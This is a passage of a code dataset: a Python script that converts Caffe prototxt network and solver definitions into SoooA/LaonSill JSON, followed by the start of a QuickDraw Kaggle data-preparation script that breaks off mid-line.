}),\n 'param' + LIST_DELEM + '1': OrderedDict({\n 'lr_mult': 'biasUpdateParam.lr_mult',\n 'decay_mult': 'biasUpdateParam.decay_mult'\n }),\n 'inner_product_param': OrderedDict({\n 'num_output': 'nOut',\n 'weight_filler': OrderedDict({\n 'type': 'weightFiller.type',\n 'value': 'weightFiller.value',\n 'mean': 'weightFiller.mean',\n 'std': 'weightFiller.std'\n }),\n 'bias_filler': OrderedDict({\n 'type': 'biasFiller.type',\n 'value': 'biasFiller.value',\n 'mean': 'biasFiller.mean',\n 'std': 'biasFiller.std'\n })\n })\n})\n\n\"\"\"\n# for nvCaffe batch_norm_layer\nbatchnorm_dict = OrderedDict({\n 'batch_norm_param': OrderedDict({\n 'moving_average_fraction': 'movingAverageFraction',\n 'eps': 'eps',\n 'scale_bias': 'scaleBias',\n 'use_global_stats': 'useGlobalStats'\n })\n})\n\"\"\"\n\n# for caffe batch_norm_layer\nbatchnorm_dict = OrderedDict({\n 'batch_norm_param': OrderedDict({\n 'moving_average_fraction': 'movingAverageFraction',\n 'eps': 'eps',\n 'use_global_stats': 
'useGlobalStats'\n })\n})\n\nscale_dict = OrderedDict({\n 'scale_param' : OrderedDict({\n 'axis' : 'axis',\n 'num_axes' : 'numAxes',\n 'filler': OrderedDict({\n 'type': 'filler.type',\n 'value': 'filler.value',\n 'mean': 'filler.mean',\n 'std': 'filler.std'\n }),\n 'bias_term' : 'biasTerm',\n 'bias_filler': OrderedDict({\n 'type': 'biasFiller.type',\n 'value': 'biasFiller.value',\n 'mean': 'biasFiller.mean',\n 'std': 'biasFiller.std'\n })\n })\n})\n\nsoftmaxwithloss_dict = OrderedDict({\n 'loss_weight': 'lossWeight'\n})\n\nsoftmax_dict = OrderedDict({\n 'axis': 'softmaxAxis'\n})\n\neltwise_dict = OrderedDict({\n 'eltwise_param': OrderedDict({\n 'operation': 'operation',\n 'coeff': 'coeff',\n 'stable_prod_grad': 'stableProdGrad'\n })\n})\n\n\nlayer_prop = OrderedDict()\nnetwork_prop = OrderedDict()\n\nfiller_param_converter = OrderedDict({\n \"constant\": \"Constant\",\n \"gaussian\": \"Gaussian\",\n \"uniform\": \"Uniform\",\n \"xavier\": \"Xavier\",\n \"msra\": \"MSRA\"\n})\npooling_type_converter = OrderedDict({\n \"MAX\": \"Max\",\n \"AVE\": \"Avg\"\n})\neltwise_op_converter = OrderedDict({\n \"PROD\": \"PROD\",\n \"SUM\": \"SUM\",\n \"MAX\": \"MAX\"\n})\n\nsolver_dict = OrderedDict({\n \"display\": \"testInterval\",\n \"base_lr\": \"baseLearningRate\",\n \"lr_policy\": \"lrPolicy\",\n \"max_iter\": \"maxIterations\",\n \"power\": \"power\",\n \"momentum\": \"momentum\",\n \"weight_decay\": \"weightDecay\",\n \"snapshot\": \"saveInterval\"\n})\n\ninner_id_dict = OrderedDict()\n\n\ndef out_file(line, depth_level, outfile):\n final = ''\n for _ in range(depth_level):\n final += '\\t'\n final += line\n final += '\\n'\n outfile.write(final)\n\ndef gen_key_line(key):\n return '\\\"' + key + '\\\" : ' \n\n\ndef normalize_prop_value(prop):\n if prop == 'std::string':\n return 'str'\n if prop == 'uint32_t':\n return 'int'\n if prop == 'double':\n return 'float'\n return prop\n\ndef parse_layer_prop_def(def_path):\n json_data = open(def_path).read()\n temp = json.loads(json_data)\n\n # parent layer들이 먼저 나오도록 sort\n layer_prop_def = OrderedDict()\n while True:\n keys = temp.keys()\n for k in keys:\n v = temp[k]\n parent = v['PARENT']\n if parent == '':\n layer_prop_def[k] = v\n temp.pop(k, None)\n else:\n if parent in layer_prop_def:\n layer_prop_def[k] = v\n temp.pop(k, None)\n if len(temp.keys()) == 0:\n break\n\n layer_prop.clear()\n for layer_name in layer_prop_def:\n parent = layer_prop_def[layer_name]['PARENT']\n vars = layer_prop_def[layer_name]['VARS']\n\n d = None\n # Base 제외 상속받는 레이어가 있는 경우 \n if parent != '' and parent != 'Base':\n assert(parent in layer_prop), \"PARENT layer prop should be defined first:\" \\\n \"{}\".format(parent)\n d = OrderedDict(layer_prop[parent])\n else:\n d = OrderedDict()\n\n for var in vars:\n if len(var) == 3:\n d[var[0]] = normalize_prop_value(var[1])\n # var가 obj인 경우 \n elif len(var) == 4:\n pre = var[0]\n prop_fields = var[3]\n for prop_field in prop_fields:\n field = pre + \".\" + prop_field[0]\n d[field] = normalize_prop_value(prop_field[1])\n else:\n assert (False), \"invalid length\"\n\n layer_prop[layer_name] = d\n\ndef parse_network_prop_def(def_path):\n json_data = open(def_path).read()\n network_prop_def = json.loads(json_data)\n\n network_prop.clear()\n vars = network_prop_def['VARS']\n\n for var in vars:\n network_prop[var[0]] = normalize_prop_value(var[1])\n\n\n\n\n# root부터 leaf까지 한 레이어에 대해 전체 key 리스트 목록을 조회\n# @param depth_keys: 최종 depth_key가 담기는 list\n# cf) temp_keys: 현재의 경로를 담고 있는 depth key\ndef get_depth_keys(d, parent_keys, depth_keys):\n 
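# Illustration of the traversal below (added for clarity): get_depth_keys()
# flattens a nested OrderedDict into root-to-leaf key paths, e.g. a conv layer
# object produces paths such as ['convolution_param', 'weight_filler', 'type'],
# and repeated blocks are addressed with the '^' LIST_DELEM suffix ('param^0',
# 'param^1') so they can be matched against the mapping tables defined above.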
keys = d.keys()\n key_len = len(keys)\n\n for idx in range(key_len):\n k = keys[idx]\n v = d[k]\n\n temp_keys = None\n if parent_keys == None:\n temp_keys = list()\n else:\n temp_keys = list(parent_keys)\n\n if type(v) is OrderedDict:\n temp_keys.append(k)\n get_depth_keys(v, temp_keys, depth_keys)\n elif type(v) is list and type(v[0]) is OrderedDict :\n for idx in range(len(v)):\n item = v[idx]\n temp_keys.append(k + LIST_DELEM + str(idx))\n\n # list안 dict 케이스\n if type(item) is OrderedDict:\n get_depth_keys(item, temp_keys, depth_keys)\n # list안 list 케이스\n elif type(item) is list:\n assert (False), \"not implemented case\"\n # list안 기타 item 케이스\n else:\n depth_keys.append(temp_keys)\n\n temp_keys.pop()\n else:\n temp_keys.append(k) \n depth_keys.append(temp_keys)\n \n\n# 여러 단계로 구성된 key가 layer dict의 정의와 일치하는지 테스트\ndef is_valid_depth_key(d, depth_key):\n depth_key_len = len(depth_key)\n\n value = None\n for idx in range(depth_key_len):\n key = depth_key[idx]\n\n if key not in d:\n return False\n\n if idx < depth_key_len - 1:\n value = d[key]\n if not type(value) is OrderedDict:\n return False\n d = value\n\n return True\n\ndef get_special_key(key):\n splits = key.split(LIST_DELEM)\n if len(splits) == 2:\n return [splits[0], int(splits[1])]\n elif len(splits) == 1:\n return [None, -1]\n else:\n assert (False), \"invalid key: {}\".format(key)\n\n\n\ndef retrieve_key_value(layer_dict, obj_dict, depth_key):\n depth_key_len = len(depth_key)\n\n ret_key = None\n ret_val = None\n for idx in range(depth_key_len):\n key = depth_key[idx]\n special_key, list_index = get_special_key(key)\n\n ret_key = layer_dict[key]\n if special_key == None:\n ret_val = obj_dict[key]\n else:\n ret_val = obj_dict[special_key][list_index]\n\n layer_dict = ret_key\n obj_dict = ret_val\n\n return ret_key, ret_val\n\ndef convert_key_value_to_line(layer, key, value, last_line):\n line = gen_key_line(key)\n\n prop_type = 'str'\n if key != 'layer':\n assert(layer in layer_prop), \"layer [{}] is not in layer_prop\".format(layer)\n assert(key in layer_prop[layer]), \"prop [{}] is not in layer_prop[{}]\".format(key, layer)\n prop_type = layer_prop[layer][key]\n\n if prop_type == 'float':\n value = str(value)\n if not \".\" in value:\n value += \".0\"\n line += value\n elif prop_type == 'int' or prop_type == 'float' or prop_type == 'bool':\n line += str(value)\n elif prop_type == 'std::vector':\n line += '['\n value_len = len(value)\n for i in range(value_len):\n line += '\\\"' + value[i] + '\\\"'\n if i < value_len -1:\n line += ', '\n line += ']'\n elif prop_type == 'std::vector':\n line += '['\n value_len = len(value)\n for i in range(value_len):\n line += value[i]\n if i < value_len -1:\n line += ', '\n line += ']'\n\n else:\n line += '\\\"' + value + '\\\"' \n\n if not last_line:\n line += ','\n\n return line\n \n\ndef gen_softmax_inner_layer(axis):\n inner_layer_type = 'Softmax'\n inner_layer_id = get_inner_id(inner_layer_type)\n\n # 생성자로 바로 Dict를 생성하니 순서가 꼬인다.\n inner_layer_obj = OrderedDict()\n inner_layer_obj[\"name\"] = \"inner_softmax\"\n inner_layer_obj[\"type\"] = \"Softmax\"\n inner_layer_obj[\"bottom\"] = [\"inner_softmax_\" + str(inner_layer_id) + \"_input\"]\n inner_layer_obj[\"top\"] = [\"inner_softmax_\" + str(inner_layer_id) + \"_output\"]\n inner_layer_obj[\"axis\"] = axis\n\n inner_depth_keys = list()\n for key in inner_layer_obj.keys():\n inner_depth_keys.append(list())\n inner_depth_keys[-1].append(key)\n\n return inner_layer_id, inner_layer_obj, inner_depth_keys\n\n\n\ndef 
innerlayer_handler(inner_layer_type, inner_layer_id, inner_layer_obj, inner_depth_keys, \\\n depth_level, outfile):\n\n out_file(gen_key_line('innerLayer'), depth_level, outfile)\n out_file(LIST_START, depth_level, outfile)\n depth_level += 1\n\n out_file(OBJ_START, depth_level, outfile)\n depth_level += 1\n\n common_handler(inner_layer_id, inner_layer_obj, inner_depth_keys, depth_level, outfile)\n layer_handler_dict[inner_layer_type](inner_layer_obj, inner_depth_keys, depth_level, outfile)\n\n depth_level -= 1\n out_file(OBJ_END, depth_level, outfile)\n\n depth_level -= 1\n out_file(LIST_END, depth_level, outfile)\n\n\n\ndef common_handler(layer_id, layer_obj, depth_keys, depth_level, outfile):\n wasType = False\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n\n if not is_valid_depth_key(common_dict, depth_key):\n continue\n\n key, value = retrieve_key_value(common_dict, layer_obj, depth_key)\n\n dst_value = None\n # special case: type인 경우 value를 변환해야 함\n # 'type'이 last_line일 수는 없다고 봄 (input 또는 output이 따라옴)\n if depth_key[0] == 'type':\n value = layer_convert_dict[value] \n wasType = True\n\n line = convert_key_value_to_line('Base', key, value, last_line) \n out_file(line, depth_level, outfile)\n\n if wasType:\n line = convert_key_value_to_line('Base', 'id', layer_id, last_line)\n out_file(line, depth_level, outfile)\n wasType = False\n\ndef data_handler(layer_obj, depth_keys, depth_level, outfile):\n pass\n\ndef concat_handler(layer_obj, depth_keys, depth_level, outfile):\n pass\n\ndef input_handler(layer_obj, depth_keys, depth_level, outfile):\n pass\n\ndef convolution_handler(layer_obj, depth_keys, depth_level, outfile):\n paramIdx = 0\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n if depth_key[0] == 'param':\n depth_key[0] += LIST_DELEM + str(paramIdx)\n paramIdx += 1\n\n assert(is_valid_depth_key(convolution_dict, depth_key)), \\\n \"invalid depth key in convolution layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(convolution_dict, layer_obj, depth_key)\n #print(\"key={}, value={}\".format(key, value))\n\n if type(key) is list:\n key_len = len(key)\n for key_idx in range(key_len):\n k = key[key_idx]\n \"\"\"\n if key_idx == key_len - 1:\n last_line = True\n else:\n last_line = False\n \"\"\"\n\n line = convert_key_value_to_line('Conv', k, value, False)\n out_file(line, depth_level, outfile)\n else:\n if key == \"weightFiller.type\" or key == \"biasFiller.type\":\n assert (value in filler_param_converter), \"Unsupported filler type: \"\\\n \"{}\".format(value)\n value = filler_param_converter[value]\n\n line = convert_key_value_to_line('Conv', key, value, last_line)\n out_file(line, depth_level, outfile)\n\n\ndef pooling_handler(layer_obj, depth_keys, depth_level, outfile):\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n assert(is_valid_depth_key(pooling_dict, depth_key)), \\\n \"invalid depth key in pooling layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(pooling_dict, layer_obj, depth_key)\n #print(\"key={}, value={}\".format(key, value))\n\n if type(key) is list:\n\n key_len = len(key)\n for key_idx in range(key_len):\n k = key[key_idx]\n \"\"\"\n if 
key_idx == key_len - 1:\n last_line = True\n else:\n last_line = False\n \"\"\"\n line = convert_key_value_to_line('Pooling', k, value, False)\n out_file(line, depth_level, outfile)\n else:\n if key == \"poolingType\":\n assert (value in pooling_type_converter), \"Unsupported pooling type: \"\\\n \"{}\".format(value)\n value = pooling_type_converter[value]\n\n line = convert_key_value_to_line('Pooling', key, value, last_line)\n out_file(line, depth_level, outfile)\n\n\ndef innerproduct_handler(layer_obj, depth_keys, depth_level, outfile):\n paramIdx = 0\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n if depth_key[0] == 'param':\n depth_key[0] += LIST_DELEM + str(paramIdx)\n paramIdx += 1\n\n assert(is_valid_depth_key(innerproduct_dict, depth_key)), \\\n \"invalid depth key in innerproduct layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(innerproduct_dict, layer_obj, depth_key)\n #print(\"key={}, value={}\".format(key, value))\n\n if type(key) is list:\n key_len = len(key)\n for key_idx in range(key_len):\n k = key[key_idx]\n if key_idx == key_len - 1:\n last_line = True\n else:\n last_line = False\n line = convert_key_value_to_line('FullyConnected', k, value, last_line)\n out_file(line, depth_level, outfile)\n else:\n if key == \"weightFiller.type\" or key == \"biasFiller.type\":\n assert (value in filler_param_converter), \"Unsupported filler type: \"\\\n \"{}\".format(value)\n value = filler_param_converter[value]\n line = convert_key_value_to_line('FullyConnected', key, value, last_line)\n out_file(line, depth_level, outfile)\n\n\ndef batchnorm_handler(layer_obj, depth_keys, depth_level, outfile):\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n assert(is_valid_depth_key(batchnorm_dict, depth_key)), \\\n \"invalid depth key in batchnorm layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(batchnorm_dict, layer_obj, depth_key)\n\n line = convert_key_value_to_line('BatchNorm3', key, value, last_line)\n out_file(line, depth_level, outfile)\n\ndef scale_handler(layer_obj, depth_keys, depth_level, outfile):\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n assert(is_valid_depth_key(scale_dict, depth_key)), \\\n \"invalid depth key in scale layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(scale_dict, layer_obj, depth_key)\n\n line = convert_key_value_to_line('Scale', key, value, last_line)\n out_file(line, depth_level, outfile)\n\ndef relu_handler(layer_obj, depth_keys, depth_level, outfile):\n print('relu_handler ... 
')\n pass\n\ndef softmax_handler(layer_obj, depth_keys, depth_level, outfile):\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n assert(is_valid_depth_key(softmax_dict, depth_key)), \\\n \"invalid depth key in softmax layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(softmax_dict, layer_obj, depth_key)\n\n line = convert_key_value_to_line('Softmax', key, value, last_line)\n out_file(line, depth_level, outfile)\n\ndef dropout_handler(layer_obj, depth_keys, depth_level, outfile):\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n assert(is_valid_depth_key(dropout_dict, depth_key)), \\\n \"invalid depth key in dropout layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(dropout_dict, layer_obj, depth_key)\n\n line = convert_key_value_to_line('DropOut', key, value, last_line)\n out_file(line, depth_level, outfile)\n\ndef eltwise_handler(layer_obj, depth_keys, depth_level, outfile):\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n assert(is_valid_depth_key(eltwise_dict, depth_key)), \\\n \"invalid depth key in eltwise layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(eltwise_dict, layer_obj, depth_key)\n\n if key == \"operation\":\n assert (value in eltwise_op_converter), \"Unsupported eltwise op: \"\\\n \"{}\".format(value)\n value = eltwise_op_converter[value]\n\n # 아래의 layer 이름은 SoooA 기준이다.\n line = convert_key_value_to_line('ElementWise', key, value, last_line)\n out_file(line, depth_level, outfile)\n\n\ndef get_inner_id(layer_type):\n layer_id = -1\n\n if layer_type in inner_id_dict:\n inner_id_dict[layer_type] += 10\n layer_id = inner_id_dict[layer_type]\n else:\n global INNER_ID_START\n INNER_ID_START += 1000\n inner_id_dict[layer_type] = INNER_ID_START\n layer_id = inner_id_dict[layer_type]\n\n return layer_id\n\n\ndef softmaxwithloss_handler(layer_obj, depth_keys, depth_level, outfile):\n depth_keys_len = len(depth_keys)\n axis = 2\n foundPropDown = False\n foundSoftmaxAxis = False\n\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n assert(is_valid_depth_key(softmaxwithloss_dict, depth_key)), \\\n \"invalid depth key in softmaxwithloss layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(softmaxwithloss_dict, layer_obj, depth_key)\n if key == \"softmaxAxis\":\n axis = int(value)\n foundSoftmaxAxis = True\n elif key == \"propDown\":\n foundPropDown = True\n\n line = convert_key_value_to_line('SoftmaxWithLoss', key, value, last_line)\n out_file(line, depth_level, outfile)\n\n if not foundPropDown:\n line = convert_key_value_to_line('Base', 'propDown', [\"true\", \"false\"], False)\n out_file(line, depth_level, outfile)\n if not foundSoftmaxAxis:\n line = convert_key_value_to_line('SoftmaxWithLoss', 'softmaxAxis', axis, False)\n out_file(line, depth_level, outfile)\n\n\n inner_layer_id, inner_layer_obj, inner_depth_keys = gen_softmax_inner_layer(axis)\n innerlayer_handler('Softmax', inner_layer_id, inner_layer_obj, inner_depth_keys, \\\n depth_level, 
outfile)\n\n\n\n\n\n\n\nlayer_handler_dict = OrderedDict({\n 'Data': data_handler,\n 'Input': input_handler,\n 'Convolution': convolution_handler,\n 'Pooling': pooling_handler,\n 'InnerProduct': innerproduct_handler,\n 'ReLU': relu_handler,\n 'Softmax': softmax_handler,\n 'BatchNorm': batchnorm_handler,\n 'Scale': scale_handler,\n 'SoftmaxWithLoss': softmaxwithloss_handler,\n 'Concat': concat_handler,\n 'Softmax': softmax_handler,\n 'Eltwise': eltwise_handler,\n 'Dropout': dropout_handler,\n 'xxxxxxxxxxxxxxxxxxxxxxx': None\n})\n\n\n\n\n\n\n \ndef get_arguments(): \n \"\"\"Parse all the arguments provided from the CLI. \n \n Returns: \n A list of parsed arguments. \n \"\"\" \n parser = argparse.ArgumentParser(description=\"Caffe protobuf to SoooA network def Converter\") \n parser.add_argument(\"-i\", \"--infile\", type=str,\n help=\"input caffe network definition protobuf file\") \n parser.add_argument(\"-s\", \"--solver\", type=str, required=False,\n help=\"input caffe solver definition protobuf file\") \n parser.add_argument(\"-o\", \"--outfile\", type=str, \n help=\"output soooa network definition json file\")\n parser.add_argument(\"--layerpropdef\", type=str, default=LAYER_PROP_DEF,\n help=\"output soooa network definition json file\")\n parser.add_argument(\"--networkpropdef\", type=str, default=NETWORK_PROP_DEF,\n help=\"output soooa network definition json file\")\n return parser.parse_args() \n\ndef preprocess_line(line):\n if line.startswith('#'):\n print('comment: skip')\n return ''\n\n splits = line.split('#')\n line = splits[0].strip()\n\n return line\n\ndef preprocess_lines(lines):\n lines_len = len(lines)\n\n for line_idx in reversed(xrange(lines_len)): \n line = lines[line_idx].strip()\n line = preprocess_line(line)\n if len(line) < 1:\n del lines[line_idx]\n else:\n lines[line_idx] = line\n\n\ndef get_line_type(line):\n line_type = None\n if line.endswith('{'):\n line_type = 'obj_head'\n elif line == '}':\n line_type = 'obj_tail'\n # 반드시 obj_field보다 먼저 처리해야 함.\n # 그렇지 않을 경우 inline obj가 obj_field로 걸림\n elif '{' in line and ':' in line and '}' in line:\n line_type = 'inline_obj'\n elif ':' in line:\n line_type = 'obj_field'\n else:\n line_type = 'unknown'\n\n return line_type\n\n\n\n# obj head에 대해서만!\n# field는 별도 처리 ...\ndef handle_obj_head(line, obj_stack):\n assert (len(obj_stack) > 0), \"obj_stack is empty.\"\n cur_obj = obj_stack[-1]\n\n obj_name = line.split('{')[0].strip()\n obj = OrderedDict()\n\n # obj가 repeated 타입인 경우\n if obj_name in list_item:\n if not obj_name in cur_obj:\n cur_obj[obj_name] = list()\n cur_obj[obj_name].append(obj)\n\n # obj가 repeated 타입이 아닌 경우 \n else:\n cur_obj[obj_name] = obj\n\n # 추가한 obj를 stack에 push\n obj_stack.append(obj)\n\n\ndef handle_obj_tail(line, obj_stack):\n assert (len(obj_stack) > 0), \"obj_stack is empty.\"\n\n obj_stack.pop()\n\n\n\ndef handle_obj_field(line, obj_stack):\n assert (len(obj_stack) > 0), \"obj_stack is empty.\"\n cur_obj = obj_stack[-1]\n\n splits = line.split(':')\n assert (len(splits) == 2), \"invalid obj_field line: {}\".format(line)\n\n field_name = splits[0].strip()\n field_value = splits[1].strip()\n field_value = field_value.replace('\\\"', '').replace('\\'', '')\n\n #assert (not field_name in cur_obj), \"field name duplicated: {}\".format(line)\n # obj가 repeated 타입인 경우\n if field_name in list_item:\n if not field_name in cur_obj:\n cur_obj[field_name] = list()\n cur_obj[field_name].append(field_value)\n\n # obj가 repeated 타입이 아닌 경우 \n else:\n cur_obj[field_name] = field_value\n\n\n\ndef 
handle_inline_obj(line, obj_stack):\n print(\"not handle inline obj currently... handle it manually: [{}]\".format(line))\n pass\n\ndef parse_layer(lines, cur_line, unhandled_lines):\n layer_start = False\n layer_end = False\n stack_size = 0\n\n obj_stack = list()\n layer_dict = OrderedDict()\n obj_stack.append(layer_dict)\n\n while not layer_end:\n line = lines[cur_line]\n #line = lines[cur_line].strip()\n cur_line += 1\n\n #print('cur line: [{}]'.format(line))\n #line = preprocess_line(line)\n #print('preprocessed: [{}]'.format(line))\n\n # ignores empty line\n #if len(line) < 1:\n # continue\n\n line_type = get_line_type(line)\n #print('line type: [{}]'.format(line_type))\n assert(line_type != 'unknown'), \"unknown line type ...: {}\".format(line)\n\n if not layer_start: \n if line_type == 'obj_head' and line.startswith('layer'):\n layer_start = True\n layer_dict.clear()\n continue\n elif line_type == 'obj_field':\n print('Network field ... skip')\n continue\n else:\n assert(False), \"invalid line->{}\".format(line)\n else:\n if line_type == 'obj_tail' and len(obj_stack) == 1:\n layer_start = False\n layer_end = True\n continue\n elif line_type == 'obj_head' and line.startswith('layer'):\n assert(False), \"invalid line->{}\".format(line)\n\n # layer obj가 시작하지 않았을 경우 이쪽으로 무조건 내려오지 않음\n # layer obj가 시작했을 경우 layer obj의 끝을 만난 경우가 아니면 항상 내려옴\n # layer obj의 content를 아래에서 처리 \n\n # layer object head has been filtered already\n # 이 경우 항상 layer inner obj head\n if line_type == 'obj_head':\n handle_obj_head(line, obj_stack)\n # 이 경우 항상 layer inner obj tail\n elif line_type == 'obj_tail':\n handle_obj_tail(line, obj_stack)\n elif line_type == 'obj_field':\n handle_obj_field(line, obj_stack)\n elif line_type == 'inline_obj':\n #handle_inline_obj(line, obj_stack)\n unhandled_lines.append(cur_line - 1)\n\n #print('------------------------------------')\n\n\n assert (len(obj_stack) == 1), \"obj stack should only contain layer obj\"\n return cur_line, obj_stack[0]\n\n\ndef convert(layer_id, layer_obj, depth_level, outfile, last_layer):\n type = layer_obj['type']\n\n if type in skip_layers:\n print('Skips [{}] layer ... '.format(type))\n return\n assert (type in layer_handler_dict), \"handler for type {} is not implemented\".format(type)\n \n out_file(OBJ_START, depth_level, outfile)\n depth_level += 1\n\n depth_keys = list()\n get_depth_keys(layer_obj, None, depth_keys)\n\n #for depth_key in depth_keys:\n # print(depth_key)\n common_handler(layer_id, layer_obj, depth_keys, depth_level, outfile)\n layer_handler_dict[type](layer_obj, depth_keys, depth_level, outfile)\n\n\n depth_level -= 1\n if not last_layer:\n out_file(OBJ_END + ',\\n', depth_level, outfile)\n else:\n out_file(OBJ_END + '\\n', depth_level, outfile)\n\n\n\n\n\ndef parse_solver(solver_path, depth_level, outfile):\n solverfile = open(solver_path, 'rb')\n lines = solverfile.readlines()\n solverfile.close()\n\n preprocess_lines(lines) \n\n\n\n last_line = False\n lines_len = len(lines)\n for line_idx in xrange(lines_len):\n line = lines[line_idx]\n if line_idx == lines_len - 1:\n last_line = True\n\n splits = line.split(':')\n assert (len(splits) == 2), \"invalid obj_field line: {}\".format(line)\n\n field_name = splits[0].strip()\n field_value = splits[1].strip()\n value = field_value.replace('\\\"', '').replace('\\'', '')\n\n if not field_name in solver_dict:\n print(\"unknown solver field {} ... 
skip ...\".format(field_name))\n continue\n \n key = solver_dict[field_name]\n\n\n\n\n line = '\\\"' + key + '\\\" : ' \n\n prop_type = 'str'\n if key != 'layer':\n assert(key in network_prop), \"solver field [{}] is not in network_prop\".format(key)\n prop_type = network_prop[key]\n\n if prop_type == 'float':\n value = str(value)\n if not \".\" in value:\n value += \".0\"\n line += value\n elif prop_type == 'int' or prop_type == 'float' or prop_type == 'bool':\n line += str(value)\n elif prop_type == 'std::vector':\n line += '['\n value_len = len(value)\n for i in range(value_len):\n line += '\\\"' + value[i] + '\\\"'\n if i < value_len -1:\n line += ', '\n line += ']'\n else:\n line += '\\\"' + value + '\\\"' \n\n if not last_line:\n line += ','\n\n out_file(line, depth_level, outfile)\n\n\n \n \ndef main(): \n \"\"\"Create the model and start the training.\"\"\" \n args = get_arguments() \n\n infile_path = args.infile\n solver_path = args.solver\n outfile_path = args.outfile \n layerpropdef_path = args.layerpropdef\n networkpropdef_path = args.networkpropdef\n\n has_solver = (solver_path != None)\n\n\n #f = open('inception_v3.prototxt', 'rb')\n infile = open(infile_path, 'rb')\n lines = infile.readlines()\n infile.close()\n \n parse_layer_prop_def(layerpropdef_path)\n\n #if os.path.exists(outfile_path):\n # os.remove(outfile_path)\n outfile = open(outfile_path, 'w')\n depth_level = 0\n\n out_file(OBJ_START, depth_level, outfile)\n depth_level += 1\n out_file(gen_key_line('layers'), depth_level, outfile)\n out_file(LIST_START, depth_level, outfile)\n depth_level += 1\n\n unhandled_lines = list()\n\n preprocess_lines(lines)\n num_lines = len(lines)\n\n cur_line = 0\n layer_id = 0\n\n first_layer = True\n last_layer = False\n while cur_line < num_lines:\n cur_line, layer_obj = parse_layer(lines, cur_line, unhandled_lines)\n #print(layer_obj)\n\n if first_layer:\n if 'Input' != layer_obj['type'] or 'Data' != layer_obj['type']:\n layer_id += 10\n first_layer = False\n\n if cur_line == num_lines:\n last_layer = True\n\n convert(layer_id, layer_obj, depth_level, outfile, last_layer)\n layer_id += 10\n\n \n depth_level -= 1\n out_file(LIST_END + \",\\n\", depth_level, outfile)\n\n\n out_file(gen_key_line('configs'), depth_level, outfile)\n out_file(OBJ_START, depth_level, outfile)\n depth_level += 1\n\n\n\n if has_solver:\n parse_network_prop_def(networkpropdef_path)\n parse_solver(solver_path, depth_level, outfile) \n\n\n\n\n\n\n depth_level -= 1\n out_file(OBJ_END, depth_level, outfile)\n\n depth_level -= 1\n out_file(OBJ_END, depth_level, outfile)\n\n outfile.close()\n\n print('unhandled lines:')\n for ln in unhandled_lines:\n print(ln)\n\n\n\n\n\n \nif __name__ == '__main__': \n main() \n","repo_name":"oopsoopskeke/LaonSillv2","sub_path":"LaonSill/scripts/networkdef/caffe2laonsill.py","file_name":"caffe2laonsill.py","file_ext":"py","file_size_in_byte":37407,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"14161396824","text":"import glob\nimport math\nimport os\nimport shutil\nfrom multiprocessing import Pool\n\nimport h5py\nimport numpy as np\nimport pandas as pd\n\nfrom utils import draw_strokes, read_lines, flatten_strokes, flatten_stroke_lens\n\n\ndef calculate_total_data_size():\n categories = read_lines(\"/storage/kaggle/quickdraw/categories.txt\")\n\n size = 0\n for category in categories:\n csv_file_name = \"/storage/kaggle/quickdraw/train_simplified_shard_0/{}-0.csv\".format(category)\n\n with open(csv_file_name) as 
csv_file:\n size += sum(1 for _ in csv_file) - 1\n\n print(\"total data size: {}\".format(size))\n return size\n\n\ndef prepare_strokes_pandas():\n categories = read_lines(\"/storage/kaggle/quickdraw/categories.txt\")\n\n for category in categories:\n csv_file_name = \"/storage/kaggle/quickdraw/train_simplified_shard_0/{}-0.csv\".format(category)\n\n print(\"processing file '{}'\".format(csv_file_name), flush=True)\n\n df = pd.read_csv(\n csv_file_name,\n index_col=\"key_id\",\n usecols=[\"key_id\", \"drawing\", \"word\"],\n converters={\n \"word\": lambda word: categories.index(word),\n \"drawing\": lambda drawing: eval(drawing)\n })\n\n df = df.rename(columns={\"word\": \"category\"})\n\n df.to_hdf(\"quickdraw_train_pd.hdf5\", key=category)\n\n shutil.move(\"quickdraw_train_pd.hdf5\", \"/storage/kaggle/quickdraw/quickdraw_train_pd.hdf5\")\n\n\ndef prepare_strokes():\n categories = read_lines(\"/storage/kaggle/quickdraw/categories.txt\")\n\n with h5py.File(\"quickdraw_train.hdf5\", \"w\", libver=\"latest\") as data_file:\n data_size = calculate_total_data_size()\n\n key_id_ds = data_file.create_dataset(\"key_id\", (data_size,), dtype=np.int64)\n category_ds = data_file.create_dataset(\"category\", (data_size,), 